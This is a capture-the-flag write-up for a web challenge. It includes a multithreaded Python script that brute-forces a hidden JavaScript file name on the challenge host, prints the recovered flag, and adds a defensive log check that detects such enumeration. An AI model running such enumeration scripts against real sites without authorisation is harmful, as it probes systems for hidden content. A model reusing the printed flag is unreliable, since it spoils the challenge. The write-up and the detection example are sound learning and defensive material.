CTF-i春秋-Web-Chinese Chess (象棋)

2020.09.17

Lessons learned

  1. For multithreading in Python, import the thread pool with from multiprocessing.dummy import Pool as ThreadPool

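Chinese Chess

  1. Opened the link, played a game of Chinese chess, and even won, hahaha.
  2. Viewed the page source and found a suspicious js file whose file name is a regular expression. Requesting it directly returns 404, so I guessed that there is a js file whose name matches the regular expression.
  3. Brute-force the file name that matches the regular expression. The regular expression [abcmlyx]{2}ctf[0-9]{3}[abcmlyx]{2} means: two consecutive letters taken from the set in the square brackets, then ctf literally, and [0-9]{3} is three consecutive digits between 0 and 9. Many names satisfy this, so a multithreaded script is used to brute-force it.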
#!/usr/bin/env python
# -*- encoding: utf-8 -*-
#fileName  : decry.py
#createTime: 2020/09/17 22:35:41
#author    : 乔悟空
#purpose   : brute-force the js file whose name matches the regular expression js/[abcmlyx]{2}ctf[0-9]{3}.js
import requests
from multiprocessing.dummy import Pool as ThreadPool

url = 'http://1f94e221dfdb421698e505e4a482cf249343f4fdd6fb4089.changame.ichunqiu.com/js/'
res1 = 'abcmlyx'
res2 = '0123456789'
reqList = []
for i in res1:
    for j in res1:
        for x in res2:
            for y in res2:
                for m in res2:
                    reqList.append(url+ i+ j+ 'ctf'+ x+ y+ m+ '.js')

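def url_open(url):
    try:
        # timeout keeps one hung connection from blocking a worker thread
        req = requests.get(url, timeout=10)
        # the error page body contains '404'; any other body is printed as a hit
        if '404' not in req.text:
            print(url+req.text)
    except requests.RequestException:
        # ignore network errors and move on to the next candidate
        pass
# multiprocessing.dummy provides the Pool API backed by threads;
# with no argument the pool size defaults to the CPU count
pool = ThreadPool()
pool.map(url_open,reqList)
pool.close()
pool.join()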
  4. It took a long time to finish. The file name is myctf801.js, and the content of the js file is flag{6af42585-d1f0-4ac5-a653-d8217e13c7ae}
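
An added example, not part of the original post: a defender-side check that flags this kind of file-name enumeration in a web server access log. The log lines are constructed and assume Common Log Format; `find_enumerators`, `KEYSPACE` and the `min_misses` threshold are hypothetical names chosen for the illustration.

```python
import re
from collections import defaultdict

# Name pattern taken from the script's purpose comment: 7*7*10*10*10 candidates.
CANDIDATE = re.compile(r"^/js/[abcmlyx]{2}ctf[0-9]{3}\.js$")
KEYSPACE = 7 ** 2 * 10 ** 3
# Common Log Format (assumed): client, timestamp, request line, status.
LINE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|HEAD) (\S+) [^"]*" (\d{3}) ')

# Constructed sample access log (addresses from documentation ranges).
SAMPLE_LOG = """\
198.51.100.20 - - [17/Sep/2020:22:36:00 +0800] "GET /index.html HTTP/1.1" 200 5120
198.51.100.20 - - [17/Sep/2020:22:36:01 +0800] "GET /js/chess.js HTTP/1.1" 200 20480
203.0.113.7 - - [17/Sep/2020:22:40:01 +0800] "GET /js/aactf000.js HTTP/1.1" 404 153
203.0.113.7 - - [17/Sep/2020:22:40:01 +0800] "GET /js/aactf001.js HTTP/1.1" 404 153
203.0.113.7 - - [17/Sep/2020:22:40:01 +0800] "GET /js/aactf002.js HTTP/1.1" 404 153
203.0.113.7 - - [17/Sep/2020:22:40:02 +0800] "GET /js/abctf000.js HTTP/1.1" 404 153
203.0.113.7 - - [17/Sep/2020:23:58:40 +0800] "GET /js/myctf801.js HTTP/1.1" 200 43
198.51.100.20 - - [17/Sep/2020:22:41:00 +0800] "GET /js/aactf999.js HTTP/1.1" 404 153
"""

def find_enumerators(lines, min_misses=3):
    """Return {client: report} for clients probing many distinct candidate names."""
    misses, hits = defaultdict(set), defaultdict(set)
    for line in lines:
        m = LINE.match(line)
        if not m:
            continue  # skip malformed lines
        client, path, status = m.group(1), m.group(2).split("?", 1)[0], m.group(3)
        if not CANDIDATE.match(path):
            continue  # ordinary traffic such as /js/chess.js
        if status == "404":
            misses[client].add(path)
        elif status == "200":
            hits[client].add(path)
    report = {}
    for client, missed in misses.items():
        if len(missed) >= min_misses:
            report[client] = {
                "misses": len(missed),                 # distinct wrong guesses
                "coverage": len(missed) / KEYSPACE,    # share of the name space tried
                "found": sorted(hits[client]),         # candidate names served with 200
            }
    return report

if __name__ == "__main__":
    for client, info in find_enumerators(SAMPLE_LOG.splitlines()).items():
        print(client, info)
```

A single mistyped URL stays below the threshold, while a client walking the name space is reported together with any candidate name it eventually retrieved.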
posted @ 2020-09-18 00:27  乔悟空